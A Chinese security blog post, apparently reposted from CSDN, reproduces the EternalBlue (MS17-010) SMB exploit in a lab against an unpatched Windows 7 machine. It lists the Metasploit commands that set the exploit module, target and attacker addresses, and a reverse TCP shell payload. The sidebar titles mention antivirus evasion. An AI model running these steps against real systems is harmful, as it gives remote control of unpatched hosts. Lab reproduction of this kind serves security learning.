搜索
永恒之蓝漏洞复现
统计
  • 建站日期:2015-11-11
  • 文章总数:2410 篇
  • 评论总数:0 条
  • 分类总数:38 个
  • 最后更新:2022年07月24日

永恒之蓝漏洞复现

纸飞机-JAVA追梦 / / 0 评论 / 130 阅读 /0 赞
作者有点忙,还没写简介
本文阅读 1 分钟
首页 安全分享,WEB安全 正文

目录

漏洞介绍

环境

查看win7

msfconsole攻击

是一种利用windows系统的SMB协议来获取最高权限的漏洞,不法分子通过永恒之蓝漏洞制作勒索病毒"wannacry",漏洞利用端口"445"

kali 192.168.20.128

靶机 192.168.20.144

靶机为win7系统,且防火墙已经关闭,确定没有补丁,开放445端口。

查看Win7的IP

img

查看Win7的端口情况

img

search ms17_010

img

use exploit/windows/smb/ms17_010_eternalblue

img

show options

img

set rhost 192.168.20.144(靶机地址)

set rport 445

set lhost 192.168.20.128(攻击机地址)

set lport 4444靶机端口

set payload /windows/x64/shell/reverse_tcp(设置模块) 

img

run

img

ipconfig查看IP域Win7的IP相同

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125246447
-- 展开阅读全文 --
安全面试之XSS(跨站脚本攻击)
« 上一篇 07-24

相关推荐

BUUCTF Web [强网杯 2019]随便注

Web安全—逻辑越权漏洞(BAC)

最新Easy RCE using Docker API 复现

安全工具推荐--哥斯拉Godzilla shell管理工具

发表评论

成为第一个评论的人

热门文章

1
Go语言实现MSF免杀上线、思路可转换自己生成马进行绕过免杀!
1.3k 阅读 ,
2
免杀 编译shellcode进行绕过杀软操作!
1.1k 阅读 ,
3
远控免杀系列文章与工具
1k 阅读 ,
4
WEBSEC-信息收集--第一篇
920 阅读 ,

标签TAG

最近回复

我要留言